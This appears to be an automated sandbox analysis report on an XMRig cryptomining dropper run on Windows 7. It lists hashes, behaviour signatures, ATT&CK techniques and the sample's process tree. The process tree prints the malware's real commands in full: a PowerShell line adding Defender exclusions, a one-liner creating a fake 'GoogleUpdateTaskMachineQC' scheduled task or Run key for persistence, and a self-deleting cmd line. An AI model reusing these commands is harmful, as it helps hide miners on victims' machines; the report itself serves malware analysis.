xmrig | 165a0de3cbb54178e47215a0ad412c91f1cbbcefc3c3d35d8124c5972d1c1950

max time kernel
427s
max time network
1784s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
24-01-2024 17:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Size

2.0MB
MD5

a16a669a09bf158058b83e04e69fe38e
SHA1

f6c94763850d9e590d86057139e8895a7aacdeea
SHA256

cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512

658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
SSDEEP

49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score

10^/10

xmrig miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

Processes:

Y2JYGshMHJGuGREA.exeupdater.execonhost.exe

description	pid	process	target process
PID 2176 created 1360	2176	Y2JYGshMHJGuGREA.exe	Explorer.EXE
PID 2176 created 1360	2176	Y2JYGshMHJGuGREA.exe	Explorer.EXE
PID 2176 created 1360	2176	Y2JYGshMHJGuGREA.exe	Explorer.EXE
PID 2176 created 1360	2176	Y2JYGshMHJGuGREA.exe	Explorer.EXE
PID 2408 created 1360	2408	updater.exe	Explorer.EXE
PID 2408 created 1360	2408	updater.exe	Explorer.EXE
PID 2408 created 1360	2408	updater.exe	Explorer.EXE
PID 2408 created 1360	2408	updater.exe	Explorer.EXE
PID 900 created 1360	900	conhost.exe	Explorer.EXE
PID 2408 created 1360	2408	updater.exe	Explorer.EXE

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 30 IoCs

miner

Processes:

resource	yara_rule
behavioral29/memory/2108-71-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-73-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-74-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-78-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-80-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-82-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-84-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-86-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-88-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-90-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-97-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-99-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-101-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-103-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-105-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-107-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-109-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-116-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-118-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-120-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-122-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-124-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-126-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-128-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-130-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-132-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-134-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-136-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-138-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral29/memory/2108-140-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2796 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

2408 updater.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

2760 taskeng.exe

pid	process
2796	cmd.exe

pid	process
2408	updater.exe

pid	process
2760	taskeng.exe

UPX packed file 31 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral29/memory/2108-67-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-71-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-73-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-74-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-78-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-80-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-82-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-84-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-86-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-88-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-90-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-97-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-99-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-101-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-103-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-105-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-107-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-109-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-116-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-118-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-120-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-122-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-124-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-126-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-128-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-130-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-132-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-134-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-136-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-138-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral29/memory/2108-140-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 2408 set thread context of 900	2408	updater.exe	conhost.exe
PID 2408 set thread context of 2108	2408	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

Y2JYGshMHJGuGREA.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	Y2JYGshMHJGuGREA.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2500 schtasks.exe
3040 schtasks.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2888 WMIC.exe

pid	process
2500	schtasks.exe
3040	schtasks.exe

pid	process
2888	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 700ba39cb94fda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

Y2JYGshMHJGuGREA.exepowershell.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.execonhost.exe

pid	process
2176	Y2JYGshMHJGuGREA.exe
2176	Y2JYGshMHJGuGREA.exe
2996	powershell.exe
2176	Y2JYGshMHJGuGREA.exe
2176	Y2JYGshMHJGuGREA.exe
2592	powershell.exe
2176	Y2JYGshMHJGuGREA.exe
2176	Y2JYGshMHJGuGREA.exe
2176	Y2JYGshMHJGuGREA.exe
2176	Y2JYGshMHJGuGREA.exe
2252	powershell.exe
2408	updater.exe
2408	updater.exe
1956	powershell.exe
2408	updater.exe
2408	updater.exe
1796	powershell.exe
2408	updater.exe
2408	updater.exe
2408	updater.exe
2408	updater.exe
900	conhost.exe
900	conhost.exe
2408	updater.exe
2408	updater.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeupdater.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	2996	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	2408	updater.exe
Token: SeAssignPrimaryTokenPrivilege	2888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2888	WMIC.exe
Token: SeSecurityPrivilege	2888	WMIC.exe
Token: SeTakeOwnershipPrivilege	2888	WMIC.exe
Token: SeLoadDriverPrivilege	2888	WMIC.exe
Token: SeSystemtimePrivilege	2888	WMIC.exe
Token: SeBackupPrivilege	2888	WMIC.exe
Token: SeRestorePrivilege	2888	WMIC.exe
Token: SeShutdownPrivilege	2888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2888	WMIC.exe
Token: SeUndockPrivilege	2888	WMIC.exe
Token: SeManageVolumePrivilege	2888	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2888	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2888	WMIC.exe
Token: SeSecurityPrivilege	2888	WMIC.exe
Token: SeTakeOwnershipPrivilege	2888	WMIC.exe
Token: SeLoadDriverPrivilege	2888	WMIC.exe
Token: SeSystemtimePrivilege	2888	WMIC.exe
Token: SeBackupPrivilege	2888	WMIC.exe
Token: SeRestorePrivilege	2888	WMIC.exe
Token: SeShutdownPrivilege	2888	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2888	WMIC.exe
Token: SeUndockPrivilege	2888	WMIC.exe
Token: SeManageVolumePrivilege	2888	WMIC.exe
Token: SeLockMemoryPrivilege	2108	conhost.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

powershell.execmd.exepowershell.exetaskeng.exepowershell.exeupdater.execmd.exe

description	pid	process	target process
PID 2592 wrote to memory of 3040	2592	powershell.exe	schtasks.exe
PID 2592 wrote to memory of 3040	2592	powershell.exe	schtasks.exe
PID 2592 wrote to memory of 3040	2592	powershell.exe	schtasks.exe
PID 2796 wrote to memory of 2696	2796	cmd.exe	choice.exe
PID 2796 wrote to memory of 2696	2796	cmd.exe	choice.exe
PID 2796 wrote to memory of 2696	2796	cmd.exe	choice.exe
PID 2252 wrote to memory of 2540	2252	powershell.exe	schtasks.exe
PID 2252 wrote to memory of 2540	2252	powershell.exe	schtasks.exe
PID 2252 wrote to memory of 2540	2252	powershell.exe	schtasks.exe
PID 2760 wrote to memory of 2408	2760	taskeng.exe	updater.exe
PID 2760 wrote to memory of 2408	2760	taskeng.exe	updater.exe
PID 2760 wrote to memory of 2408	2760	taskeng.exe	updater.exe
PID 1796 wrote to memory of 2500	1796	powershell.exe	schtasks.exe
PID 1796 wrote to memory of 2500	1796	powershell.exe	schtasks.exe
PID 1796 wrote to memory of 2500	1796	powershell.exe	schtasks.exe
PID 2408 wrote to memory of 900	2408	updater.exe	conhost.exe
PID 1576 wrote to memory of 2888	1576	cmd.exe	WMIC.exe
PID 1576 wrote to memory of 2888	1576	cmd.exe	WMIC.exe
PID 1576 wrote to memory of 2888	1576	cmd.exe	WMIC.exe
PID 2408 wrote to memory of 2108	2408	updater.exe	conhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1360

C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe
"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:3040

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:2540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
3⤵
- Creates scheduled task(s)
PID:2500

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1740

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe qtdiqnkejoz
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:900

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:2696

C:\Windows\system32\taskeng.exe
taskeng.exe {5188B0C6-89D1-464F-890C-487C4159761C} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2760

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2888

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
380KB

MD5
50b69e4545852059a615d551cf644565

SHA1
4d731eed3bec9cb7335dddac0c6aa6717a0fe55b

SHA256
54dd67cfcb248ab8c72598e5d95b500a79d40c95291e0d0430a51cd1e702b41b

SHA512
d6002cd7237a6f8caef3bb5207e654fbb283b677e4e28f38925f19842ce6855fa1198fba6116ba5b1b8d6c2715ea7fc92dea2efad9831fa4199c858d2a9f8b05

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
303KB

MD5
e011c574003185a32b3936dcdb2b1dc1

SHA1
4938d7c4c6dd9ddc43838fb8f7418ad1c973a826

SHA256
5a42b4466e8508afdd2ec704f9e2676beb34e538d9c3999e2b42b0c5e5a6f25c

SHA512
6f0e38ca3675f0b6923715b053ee4c796e3e50c6c43a3345723940b3322f77a87aabe06a4c98e41877024cac907443db92cc1f824fd6ad215e94b9f1d57adc0d

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CN16SW74ZRCUXYSQ92GK.temp
Filesize
7KB

MD5
099f8030b0056510cd50978aaff6ffbe

SHA1
be993681c35bb5b50903010e99d62765837bae57

SHA256
621b183a8eacaeb30a8ffb0013afdaf0c1fffe31500fcf7e34d50dc0a80b6975

SHA512
87515ac7cad78f24d70f01589b3ac88b11153d5255d942f99080b79fc381c6fb62f4b2b30aeff0801301de35ae3b5c22961f012387be2cea022c3bd0e912b249

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
422KB

MD5
96bc788ca3efac5bb2a0dd2af0975189

SHA1
2f1a3f452583bd781ae6b9e06fae29a6208ca9b6

SHA256
4015cfb7cda84951f80fa33e305f468920f867c0bf9af24fa8f7d4c5697db8ec

SHA512
d8c6535b3eb03c1a590dc49a5ac023422830a100ef35e1a15a71d9b35d1fa4ab661ff0877379d3eab5c15d8a42b6690fe2af914f551b8de4933dd1814790b38f

Download Submit
memory/900-77-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/900-70-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1796-54-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

Filesize
9.6MB

Download
memory/1796-57-0x0000000001570000-0x00000000015F0000-memory.dmp

Filesize
512KB

Download
memory/1796-56-0x0000000001570000-0x00000000015F0000-memory.dmp

Filesize
512KB

Download
memory/1796-55-0x0000000001570000-0x00000000015F0000-memory.dmp

Filesize
512KB

Download
memory/1796-52-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

Filesize
9.6MB

Download
memory/1796-53-0x0000000001570000-0x00000000015F0000-memory.dmp

Filesize
512KB

Download
memory/1796-58-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

Filesize
9.6MB

Download
memory/1956-48-0x0000000001580000-0x0000000001600000-memory.dmp

Filesize
512KB

Download
memory/1956-50-0x000000000158B000-0x00000000015F2000-memory.dmp

Filesize
412KB

Download
memory/1956-49-0x0000000001584000-0x0000000001587000-memory.dmp

Filesize
12KB

Download
memory/1956-47-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-45-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/1956-46-0x0000000001580000-0x0000000001600000-memory.dmp

Filesize
512KB

Download
memory/1956-51-0x000007FEF53B0000-0x000007FEF5D4D000-memory.dmp

Filesize
9.6MB

Download
memory/2108-88-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-101-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-140-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-138-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-136-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-134-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-132-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-130-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-128-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-126-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-124-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-122-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-120-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-118-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-116-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-109-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-107-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-105-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-103-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-99-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-97-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-90-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-86-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-84-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-82-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-67-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-66-0x0000000000150000-0x0000000000170000-memory.dmp

Filesize
128KB

Download
memory/2108-80-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/2108-68-0x0000000000EA0000-0x0000000000EC0000-memory.dmp

Filesize
128KB

Download
memory/2108-69-0x0000000000EE0000-0x0000000000F00000-memory.dmp

Filesize
128KB

Download
memory/2108-78-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

